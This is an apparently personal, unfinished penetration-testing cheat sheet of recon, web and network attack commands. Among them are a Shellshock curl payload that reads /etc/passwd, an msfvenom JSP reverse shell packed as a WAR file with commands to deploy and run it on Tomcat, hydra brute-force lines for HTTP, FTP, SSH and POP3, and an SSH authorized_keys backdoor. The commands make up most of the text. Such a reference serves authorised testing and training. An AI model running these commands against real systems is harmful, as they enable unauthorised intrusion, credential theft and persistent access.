Penetration Testing Cheat Sheet (In Progress)

1. Reconnaissance

Network Scan

# -- Nmap Scans --
# If you are not getting results then use the -Pn flag (treat hosts as live).
sudo nmap -sn <IP>/<CIDR> # Scan for hosts in the network without port scan.
sudo nmap -sC -sV -O -oA <Name>.tcp <Target-IP-Address> -v # Scans the top tcp ports
sudo nmap -sU -oA <Name>.udp <Target-IP-Address> # Scans the top UDP ports
# After these are done run again but for all ports using the flag (-p-)
 
python3 autorecon.py <IP-Address> <Output-File> # Run auto recon to automate various enumeration steps

2. Web Attacks

Web General Tips

• View source-code and identify any hidden content.

• Check for robots.txt

• Add hosts to /etc/hosts

• Start fuzzing

• Conduct vulnerability scanning using nikto

• Check the SSL certificate for subdomains or usernames

• If there is any login page then try default credentials or/and bruteforce it

• If there is any file upload functionality then check where it's reflected

• Check any input fields to injection attacks

• If you found cgi-bin then fuzz further and try shellshock.

Sometimes you might be able to exploit a file upload vulnerability but then you don't have the permission to create a directory, in such cases, try using an existing directory.

Wordpress

• Check /wp-content/uploads

• Check the config file (wp-config.php)

• Check if there are users to bruteforce

• Run wp-scan

Joomla

• Check if there are users to bruteforce

• Run joomscan/droopescan/joomlavs

Drupal

• Enumerate usersnames by testing on /user/register or /user/<Number>

• Fuzz /node/<Number> to detect pages that might have not been noticed

• If the version is less than 8 then you can inject PHP code

Tomcat

• Try to access /manager/html from there you can upload war files (shell) However, the path is protected by basic http auth.

• Try default credentials

• Run a bruteforce attack

nikto -h <Target> # Target scanning using nikto.

# -- Fuff Fuzzing -- 
# Directory discovery
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://<Target>/FUZZ/ -v

# Extension Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://<Target>/indexFUZZ

# Page Fuzzing 
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://<Target>/FUZZ.php

# Recursive Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://<Target>/FUZZ -recursion -recursion-depth 1 -e .<Extension> -v

# Subdomain Fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.<Target>/

# Vhost Fuzzing
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://<Target>/ -H 'Host: FUZZ.<Target>' -fs <Value-To-Exclude>

# GET Parameter Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://<Target>?FUZZ=key -fs <Value-To-Exclude>

# POST Parameter Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u <Target> -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs <Value-To-Exclude>

# POST Value Fuzzing 
ffuf -w <Wordlist>:FUZZ -u <Target> -X POST -d '<Parameter>=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs <Value-To-Exclude>

# CGI Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/CGI-XPlatform.fuzz.txt -u <Target>/ccgi-bin/FUZZ
ffuf -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -u <Target>/ccgi-bin/FUZZ
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u <Target>/cgi-bin/FUZZ -e .sh,.pl,.cgi
# If a script is found then try: 
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" <Target>/cgi-bin/<Script>

# -- WordPress WPScan --
wpscan --url <Target> --enumerate u,ap,t -v -o <Target>.txt # Enumerate Scan

wpscan --url <Target> --passwords /usr/share/wordlists/rockyou.txt --usernames <Comma-Separated-Usernames> # Password Bruteforcing attack

eyewitness --web -x <Nmap-Output>.xml -d <Output-Directory> # Takes the output of nmap to produce a report with photos for each website.

cat <Nmap-Output>.xml | ./aquatone -nmap # Takes the output of nmap to produce a report with photos for each website.

# -- Joomla Commands --
droopescan scan joomla --url <Target> # Scan for Joomla vulnerabilities.
sudo python3 joomla-brute.py -u <Target> -w <Wordlist> -usr <Username> # Password Bruteforcing attack (https://github.com/ajnik/joomla-bruteforce)

joomscan -u <Target> # Scan for vulnerabilities.

# -- Drupal --
droopescan scan drupal -u <Target> # Scan for vulnerabilities.
wfuzz -c -z range,1-500 --hc 404 <Target>/node/FUZZ # Fuzz for pages

# -- Tomcat -- 
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP-Address> LPORT=<Port-Number> -f war > <Filename>.war # Generate a war shell to upload to Tomcat.
wget 'http://<Username>:<Password>@<Target>/manager/deploy?war=file:<Filename>&path=/shell' -O - # Uploads the shell for Tomcat6
curl -v -u <Username>:<Password> -T <Filename> 'http://<Target>/manager/text/deploy?path=/shellh&update=true' # Uploads the shell for Tomcat 7 and above.
curl http://<Target>/shell/ # Execute the shell.

# -- HTTP Bruteforce Attacks -- 
sudo hydra -l <Username> -P <Password-List> <Target> http-post-form "<Login-URI>:<Username-Parameter-Name>=^USER^&<Password-Parameter-Name>=^PASS^:<Failed-Message>" -V

3. Network Protocls/Attacks (In Progress)

FTP - 21

• Check for anonymous access

• Download or upload files (config files, ssh keys, etc/passwd, etc.)

• Bruteforce users

ftp <IP-Address> # Interact with the server
PASSIVE
BINARY
GET <File> # Download a file
PUT <File> # Upload a file

sudo hydra -l <Username> -P /usr/share/wordlists/rockyou.txt ftp://<IP-Address>

SSH - 22

• Bruteforce users

• Upload a key as a backdoor

ssh <Username>@<IP-Address> # Connect using username & password

ssh -i <SSH-Key> <User>@<IP-Address> # Connect using the key
chmod 600 <SSH-Key> # Permissions required for the key

sudo hydra -l <Username> -P /usr/share/wordlists/rockyou.txt ssh://<IP-Address> # Bruteforce attack

# -- Exploit using key as a backdoor -- 
ssh-keygen -f <Filename>
chmod 600 <Filename>
echo <Filename>.pub >> <Target>/.ssh/authorized_keys

SMTP - 25

• Check for users

nc -nv <IP-Address> 25 # To detect the version

smtp-user-enum -M <Mode> -U <Users-Wordlist> -t <IP-Address> # Mode can be any of RCPT, VRFY, EXPN

DNS - 53

• Try zone transfer

• Enumerate the subdomains for more targets

sudo sh -c 'echo "<Server-IP> <Domain-Name>" >> /etc/hosts' # Add DNS entry to hosts

dnsenum <Domain>
dnsrecon -d <Domain> -a 

dig axfr <Domain> @<Name-Server>

POP3 - 110

• Enumerate users

• Bruteforce users

• Read emails

# Steps to read an email
telnet <IP-Address> 110
USER <Username>
PASS <Password>
LIST
RETR <Mail-ID>
QUIT

hydra -l <Email-Address> -P /usr/share/wordlists/rockyou.txt pop3://<IP-Address> -t 10 # Bruteforce user

RPC - 135

SNMP - 161

LDAP - 389

SMB - 445

MSSQL - 1433

MYSQL - 3306